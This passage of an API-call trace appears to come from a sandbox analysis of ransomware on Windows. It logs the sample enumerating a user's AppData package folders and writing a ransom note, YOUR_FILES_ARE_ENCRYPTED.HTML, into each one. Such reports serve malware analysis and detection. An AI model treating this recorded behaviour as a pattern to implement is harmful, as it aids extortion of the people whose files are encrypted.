() returned 0x600000 [0120.194] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x3116fe0 | out: hHeap=0x600000) returned 1 [0120.194] GetProcessHeap () returned 0x600000 [0120.194] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x314b010 | out: hHeap=0x600000) returned 1 [0120.194] FindNextFileW (in: hFindFile=0x6266f8, lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0x3583d37b, ftCreationTime.dwHighDateTime=0x1d70074, ftLastAccessTime.dwLowDateTime=0x3583d37b, ftLastAccessTime.dwHighDateTime=0x1d70074, ftLastWriteTime.dwLowDateTime=0x3583d37b, ftLastWriteTime.dwHighDateTime=0x1d70074, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x63d090, dwReserved1=0x63d098, cFileName="BackgroundTransferApiGroup", cAlternateFileName="BACKGR~2")) returned 0 [0120.194] FindClose (in: hFindFile=0x6266f8 | out: hFindFile=0x6266f8) returned 1 [0120.194] wnsprintfW (in: pszDest=0x313b008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\microsoft.windowscommunicationsapps_8wekyb3d8bbwe\\AC\\INetHistory\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 143 [0120.194] GetProcessHeap () returned 0x600000 [0120.194] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x3116fe0 [0120.194] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\microsoft.windowscommunicationsapps_8wekyb3d8bbwe\\AC\\INetHistory\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\packages\\microsoft.windowscommunicationsapps_8wekyb3d8bbwe\\ac\\inethistory\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x320 [0120.196] WriteFile (in: hFile=0x320, lpBuffer=0x3116fe0*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x19e17c, lpOverlapped=0x0 | out: lpBuffer=0x3116fe0*, lpNumberOfBytesWritten=0x19e17c*=0x3c00, lpOverlapped=0x0) returned 1 [0120.197] CloseHandle (hObject=0x320) returned 1 [0120.197] GetProcessHeap () returned 0x600000 [0120.197] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x3116fe0 | out: hHeap=0x600000) returned 1 [0120.197] GetProcessHeap () returned 0x600000 [0120.197] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x313b008 | out: hHeap=0x600000) returned 1 [0120.198] FindNextFileW (in: hFindFile=0x626638, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xdc6e5fe6, ftCreationTime.dwHighDateTime=0x1d70070, ftLastAccessTime.dwLowDateTime=0xdc6e5fe6, ftLastAccessTime.dwHighDateTime=0x1d70070, ftLastWriteTime.dwLowDateTime=0xdc6e5fe6, ftLastWriteTime.dwHighDateTime=0x1d70070, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x63d156, dwReserved1=0x63d090, cFileName="Temp", cAlternateFileName="")) returned 1 [0120.198] StrStrIW (lpFirst="Temp", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0120.198] wnsprintfW (in: pszDest=0x3106fd8, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\microsoft.windowscommunicationsapps_8wekyb3d8bbwe\\AC\\Temp") returned 106 [0120.198] GetProcessHeap () returned 0x600000 [0120.198] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x313b008 [0120.199] lstrcpyW (in: lpString1=0x313b008, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\microsoft.windowscommunicationsapps_8wekyb3d8bbwe\\AC\\Temp" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\microsoft.windowscommunicationsapps_8wekyb3d8bbwe\\AC\\Temp") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\microsoft.windowscommunicationsapps_8wekyb3d8bbwe\\AC\\Temp" [0120.199] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\microsoft.windowscommunicationsapps_8wekyb3d8bbwe\\AC\\Temp", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\microsoft.windowscommunicationsapps_8wekyb3d8bbwe\\AC\\Temp\\*") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\microsoft.windowscommunicationsapps_8wekyb3d8bbwe\\AC\\Temp\\*" [0120.199] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\microsoft.windowscommunicationsapps_8wekyb3d8bbwe\\AC\\Temp\\*", lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xdc6e5fe6, ftCreationTime.dwHighDateTime=0x1d70070, ftLastAccessTime.dwLowDateTime=0xdc6e5fe6, ftLastAccessTime.dwHighDateTime=0x1d70070, ftLastWriteTime.dwLowDateTime=0xdc6e5fe6, ftLastWriteTime.dwHighDateTime=0x1d70070, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x63d090, dwReserved1=0x63d098, cFileName=".", cAlternateFileName="")) returned 0x6266f8 [0120.200] FindNextFileW (in: hFindFile=0x6266f8, lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xdc6e5fe6, ftCreationTime.dwHighDateTime=0x1d70070, ftLastAccessTime.dwLowDateTime=0xdc6e5fe6, ftLastAccessTime.dwHighDateTime=0x1d70070, ftLastWriteTime.dwLowDateTime=0xdc6e5fe6, ftLastWriteTime.dwHighDateTime=0x1d70070, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x63d090, dwReserved1=0x63d098, cFileName="..", cAlternateFileName="")) returned 1 [0120.200] FindNextFileW (in: hFindFile=0x6266f8, lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xdc6e5fe6, ftCreationTime.dwHighDateTime=0x1d70070, ftLastAccessTime.dwLowDateTime=0xdc6e5fe6, ftLastAccessTime.dwHighDateTime=0x1d70070, ftLastWriteTime.dwLowDateTime=0xdc6e5fe6, ftLastWriteTime.dwHighDateTime=0x1d70070, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x63d090, dwReserved1=0x63d098, cFileName="..", cAlternateFileName="")) returned 0 [0120.200] FindClose (in: hFindFile=0x6266f8 | out: hFindFile=0x6266f8) returned 1 [0120.200] wnsprintfW (in: pszDest=0x313b008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\microsoft.windowscommunicationsapps_8wekyb3d8bbwe\\AC\\Temp\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 136 [0120.200] GetProcessHeap () returned 0x600000 [0120.200] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x3116fe0 [0120.201] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\microsoft.windowscommunicationsapps_8wekyb3d8bbwe\\AC\\Temp\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\packages\\microsoft.windowscommunicationsapps_8wekyb3d8bbwe\\ac\\temp\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x320 [0120.202] WriteFile (in: hFile=0x320, lpBuffer=0x3116fe0*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x19e17c, lpOverlapped=0x0 | out: lpBuffer=0x3116fe0*, lpNumberOfBytesWritten=0x19e17c*=0x3c00, lpOverlapped=0x0) returned 1 [0120.203] CloseHandle (hObject=0x320) returned 1 [0120.203] GetProcessHeap () returned 0x600000 [0120.203] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x3116fe0 | out: hHeap=0x600000) returned 1 [0120.203] GetProcessHeap () returned 0x600000 [0120.203] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x313b008 | out: hHeap=0x600000) returned 1 [0120.203] FindNextFileW (in: hFindFile=0x626638, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xdc6e5fe6, ftCreationTime.dwHighDateTime=0x1d70070, ftLastAccessTime.dwLowDateTime=0xdc6e5fe6, ftLastAccessTime.dwHighDateTime=0x1d70070, ftLastWriteTime.dwLowDateTime=0xdc6e5fe6, ftLastWriteTime.dwHighDateTime=0x1d70070, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x63d156, dwReserved1=0x63d090, cFileName="Temp", cAlternateFileName="")) returned 0 [0120.204] FindClose (in: hFindFile=0x626638 | out: hFindFile=0x626638) returned 1 [0120.204] wnsprintfW (in: pszDest=0x3106fd8, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\microsoft.windowscommunicationsapps_8wekyb3d8bbwe\\AC\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 131 [0120.204] GetProcessHeap () returned 0x600000 [0120.204] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x3116fe0 [0120.204] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\microsoft.windowscommunicationsapps_8wekyb3d8bbwe\\AC\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\packages\\microsoft.windowscommunicationsapps_8wekyb3d8bbwe\\ac\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x31c [0120.205] WriteFile (in: hFile=0x31c, lpBuffer=0x3116fe0*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x19e490, lpOverlapped=0x0 | out: lpBuffer=0x3116fe0*, lpNumberOfBytesWritten=0x19e490*=0x3c00, lpOverlapped=0x0) returned 1 [0120.206] CloseHandle (hObject=0x31c) returned 1 [0120.207] GetProcessHeap () returned 0x600000 [0120.207] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x3116fe0 | out: hHeap=0x600000) returned 1 [0120.207] GetProcessHeap () returned 0x600000 [0120.207] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x3106fd8 | out: hHeap=0x600000) returned 1 [0120.208] FindNextFileW (in: hFindFile=0x6265b8, lpFindFileData=0x19e4d8 | out: lpFindFileData=0x19e4d8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xdc64d961, ftCreationTime.dwHighDateTime=0x1d70070, ftLastAccessTime.dwLowDateTime=0xdc64d961, ftLastAccessTime.dwHighDateTime=0x1d70070, ftLastWriteTime.dwLowDateTime=0xdc64d961, ftLastWriteTime.dwHighDateTime=0x1d70070, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6363f0, dwReserved1=0xffffffff, cFileName="AppData", cAlternateFileName="")) returned 1 [0120.208] StrStrIW (lpFirst="AppData", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0120.208] wnsprintfW (in: pszDest=0x30f4fc8, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\microsoft.windowscommunicationsapps_8wekyb3d8bbwe\\AppData") returned 106 [0120.208] GetProcessHeap () returned 0x600000 [0120.208] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x3106fd8 [0120.209] lstrcpyW (in: lpString1=0x3106fd8, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\microsoft.windowscommunicationsapps_8wekyb3d8bbwe\\AppData" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\microsoft.windowscommunicationsapps_8wekyb3d8bbwe\\AppData") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\microsoft.windowscommunicationsapps_8wekyb3d8bbwe\\AppData" [0120.210] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\microsoft.windowscommunicationsapps_8wekyb3d8bbwe\\AppData", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\microsoft.windowscommunicationsapps_8wekyb3d8bbwe\\AppData\\*") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\microsoft.windowscommunicationsapps_8wekyb3d8bbwe\\AppData\\*" [0120.210] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\microsoft.windowscommunicationsapps_8wekyb3d8bbwe\\AppData\\*", lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xdc64d961, ftCreationTime.dwHighDateTime=0x1d70070, ftLastAccessTime.dwLowDateTime=0xdc64d961, ftLastAccessTime.dwHighDateTime=0x1d70070, ftLastWriteTime.dwLowDateTime=0xdc64d961, ftLastWriteTime.dwHighDateTime=0x1d70070, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x63d156, dwReserved1=0x63d090, cFileName=".", cAlternateFileName="")) returned 0x6266f8 [0120.210] FindNextFileW (in: hFindFile=0x6266f8, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xdc64d961, ftCreationTime.dwHighDateTime=0x1d70070, ftLastAccessTime.dwLowDateTime=0xdc64d961, ftLastAccessTime.dwHighDateTime=0x1d70070, ftLastWriteTime.dwLowDateTime=0xdc64d961, ftLastWriteTime.dwHighDateTime=0x1d70070, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x63d156, dwReserved1=0x63d090, cFileName="..", cAlternateFileName="")) returned 1 [0120.210] FindNextFileW (in: hFindFile=0x6266f8, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xdc64d961, ftCreationTime.dwHighDateTime=0x1d70070, ftLastAccessTime.dwLowDateTime=0xdc64d961, ftLastAccessTime.dwHighDateTime=0x1d70070, ftLastWriteTime.dwLowDateTime=0xdc64d961, ftLastWriteTime.dwHighDateTime=0x1d70070, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x63d156, dwReserved1=0x63d090, cFileName="..", cAlternateFileName="")) returned 0 [0120.210] FindClose (in: hFindFile=0x6266f8 | out: hFindFile=0x6266f8) returned 1 [0120.210] wnsprintfW (in: pszDest=0x3106fd8, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\microsoft.windowscommunicationsapps_8wekyb3d8bbwe\\AppData\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 136 [0120.210] GetProcessHeap () returned 0x600000 [0120.210] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x3116fe0 [0120.211] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\microsoft.windowscommunicationsapps_8wekyb3d8bbwe\\AppData\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\packages\\microsoft.windowscommunicationsapps_8wekyb3d8bbwe\\appdata\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x31c [0120.213] WriteFile (in: hFile=0x31c, lpBuffer=0x3116fe0*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x19e490, lpOverlapped=0x0 | out: lpBuffer=0x3116fe0*, lpNumberOfBytesWritten=0x19e490*=0x3c00, lpOverlapped=0x0) returned 1 [0120.214] CloseHandle (hObject=0x31c) returned 1 [0120.215] GetProcessHeap () returned 0x600000 [0120.215] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x3116fe0 | out: hHeap=0x600000) returned 1 [0120.215] GetProcessHeap () returned 0x600000 [0120.215] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x3106fd8 | out: hHeap=0x600000) returned 1 [0120.215] FindNextFileW (in: hFindFile=0x6265b8, lpFindFileData=0x19e4d8 | out: lpFindFileData=0x19e4d8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xdc6272d1, ftCreationTime.dwHighDateTime=0x1d70070, ftLastAccessTime.dwLowDateTime=0xdc6272d1, ftLastAccessTime.dwHighDateTime=0x1d70070, ftLastWriteTime.dwLowDateTime=0xdc6272d1, ftLastWriteTime.dwHighDateTime=0x1d70070, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6363f0, dwReserved1=0xffffffff, cFileName="LocalCache", cAlternateFileName="LOCALC~1")) returned 1 [0120.215] StrStrIW (lpFirst="LocalCache", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0120.215] wnsprintfW (in: pszDest=0x30f4fc8, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\microsoft.windowscommunicationsapps_8wekyb3d8bbwe\\LocalCache") returned 109 [0120.215] GetProcessHeap () returned 0x600000 [0120.215] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x3106fd8 [0120.215] lstrcpyW (in: lpString1=0x3106fd8, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\microsoft.windowscommunicationsapps_8wekyb3d8bbwe\\LocalCache" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\microsoft.windowscommunicationsapps_8wekyb3d8bbwe\\LocalCache") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\microsoft.windowscommunicationsapps_8wekyb3d8bbwe\\LocalCache" [0120.215] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\microsoft.windowscommunicationsapps_8wekyb3d8bbwe\\LocalCache", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\microsoft.windowscommunicationsapps_8wekyb3d8bbwe\\LocalCache\\*") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\microsoft.windowscommunicationsapps_8wekyb3d8bbwe\\LocalCache\\*" [0120.215] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\microsoft.windowscommunicationsapps_8wekyb3d8bbwe\\LocalCache\\*", lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xdc6272d1, ftCreationTime.dwHighDateTime=0x1d70070, ftLastAccessTime.dwLowDateTime=0xdc6272d1, ftLastAccessTime.dwHighDateTime=0x1d70070, ftLastWriteTime.dwLowDateTime=0xdc6272d1, ftLastWriteTime.dwHighDateTime=0x1d70070, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x63d156, dwReserved1=0x63d090, cFileName=".", cAlternateFileName="")) returned 0x626638 [0120.216] FindNextFileW (in: hFindFile=0x626638, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xdc6272d1, ftCreationTime.dwHighDateTime=0x1d70070, ftLastAccessTime.dwLowDateTime=0xdc6272d1, ftLastAccessTime.dwHighDateTime=0x1d70070, ftLastWriteTime.dwLowDateTime=0xdc6272d1, ftLastWriteTime.dwHighDateTime=0x1d70070, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x63d156, dwReserved1=0x63d090, cFileName="..", cAlternateFileName="")) returned 1 [0120.216] FindNextFileW (in: hFindFile=0x626638, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xdc6272d1, ftCreationTime.dwHighDateTime=0x1d70070, ftLastAccessTime.dwLowDateTime=0xdc6272d1, ftLastAccessTime.dwHighDateTime=0x1d70070, ftLastWriteTime.dwLowDateTime=0xdc6272d1, ftLastWriteTime.dwHighDateTime=0x1d70070, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x63d156, dwReserved1=0x63d090, cFileName="..", cAlternateFileName="")) returned 0 [0120.216] FindClose (in: hFindFile=0x626638 | out: hFindFile=0x626638) returned 1 [0120.216] wnsprintfW (in: pszDest=0x3106fd8, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\microsoft.windowscommunicationsapps_8wekyb3d8bbwe\\LocalCache\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 139 [0120.216] GetProcessHeap () returned 0x600000 [0120.216] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x3116fe0 [0120.216] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\microsoft.windowscommunicationsapps_8wekyb3d8bbwe\\LocalCache\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\packages\\microsoft.windowscommunicationsapps_8wekyb3d8bbwe\\localcache\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x31c [0120.218] WriteFile (in: hFile=0x31c, lpBuffer=0x3116fe0*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x19e490, lpOverlapped=0x0 | out: lpBuffer=0x3116fe0*, lpNumberOfBytesWritten=0x19e490*=0x3c00, lpOverlapped=0x0) returned 1 [0120.219] CloseHandle (hObject=0x31c) returned 1 [0120.219] GetProcessHeap () returned 0x600000 [0120.220] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x3116fe0 | out: hHeap=0x600000) returned 1 [0120.220] GetProcessHeap () returned 0x600000 [0120.220] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x3106fd8 | out: hHeap=0x600000) returned 1 [0120.220] FindNextFileW (in: hFindFile=0x6265b8, lpFindFileData=0x19e4d8 | out: lpFindFileData=0x19e4d8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xdc6272d1, ftCreationTime.dwHighDateTime=0x1d70070, ftLastAccessTime.dwLowDateTime=0xdc6272d1, ftLastAccessTime.dwHighDateTime=0x1d70070, ftLastWriteTime.dwLowDateTime=0x2a470192, ftLastWriteTime.dwHighDateTime=0x1d70074, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6363f0, dwReserved1=0xffffffff, cFileName="LocalState", cAlternateFileName="LOCALS~1")) returned 1 [0120.220] StrStrIW (lpFirst="LocalState", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0120.220] wnsprintfW (in: pszDest=0x30f4fc8, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\microsoft.windowscommunicationsapps_8wekyb3d8bbwe\\LocalState") returned 109 [0120.220] GetProcessHeap () returned 0x600000 [0120.220] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x3106fd8 [0120.220] lstrcpyW (in: lpString1=0x3106fd8, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\microsoft.windowscommunicationsapps_8wekyb3d8bbwe\\LocalState" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\microsoft.windowscommunicationsapps_8wekyb3d8bbwe\\LocalState") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\microsoft.windowscommunicationsapps_8wekyb3d8bbwe\\LocalState" [0120.220] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\microsoft.windowscommunicationsapps_8wekyb3d8bbwe\\LocalState", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\microsoft.windowscommunicationsapps_8wekyb3d8bbwe\\LocalState\\*") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\microsoft.windowscommunicationsapps_8wekyb3d8bbwe\\LocalState\\*" [0120.220] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\microsoft.windowscommunicationsapps_8wekyb3d8bbwe\\LocalState\\*", lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xdc6272d1, ftCreationTime.dwHighDateTime=0x1d70070, ftLastAccessTime.dwLowDateTime=0x20185bcc, ftLastAccessTime.dwHighDateTime=0x1d70504, ftLastWriteTime.dwLowDateTime=0x20185bcc, ftLastWriteTime.dwHighDateTime=0x1d70504, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x63d156, dwReserved1=0x63d090, cFileName=".", cAlternateFileName="")) returned 0x6266f8 [0120.220] FindNextFileW (in: hFindFile=0x6266f8, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xdc6272d1, ftCreationTime.dwHighDateTime=0x1d70070, ftLastAccessTime.dwLowDateTime=0x20185bcc, ftLastAccessTime.dwHighDateTime=0x1d70504, ftLastWriteTime.dwLowDateTime=0x20185bcc, ftLastWriteTime.dwHighDateTime=0x1d70504, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x63d156, dwReserved1=0x63d090, cFileName="..", cAlternateFileName="")) returned 1 [0120.220] FindNextFileW (in: hFindFile=0x6266f8, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x20185bcc, ftCreationTime.dwHighDateTime=0x1d70504, ftLastAccessTime.dwLowDateTime=0x20185bcc, ftLastAccessTime.dwHighDateTime=0x1d70504, ftLastWriteTime.dwLowDateTime=0x20185bcc, ftLastWriteTime.dwHighDateTime=0x1d70504, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x63d156, dwReserved1=0x63d090, cFileName="Files", cAlternateFileName="")) returned 1 [0120.220] StrStrIW (lpFirst="Files", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0120.220] wnsprintfW (in: pszDest=0x3106fd8, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\microsoft.windowscommunicationsapps_8wekyb3d8bbwe\\LocalState\\Files") returned 115 [0120.220] GetProcessHeap () returned 0x600000 [0120.220] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x313b008 [0120.222] lstrcpyW (in: lpString1=0x313b008, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\microsoft.windowscommunicationsapps_8wekyb3d8bbwe\\LocalState\\Files" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\microsoft.windowscommunicationsapps_8wekyb3d8bbwe\\LocalState\\Files") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\microsoft.windowscommunicationsapps_8wekyb3d8bbwe\\LocalState\\Files" [0120.222] lstrcatW (in: 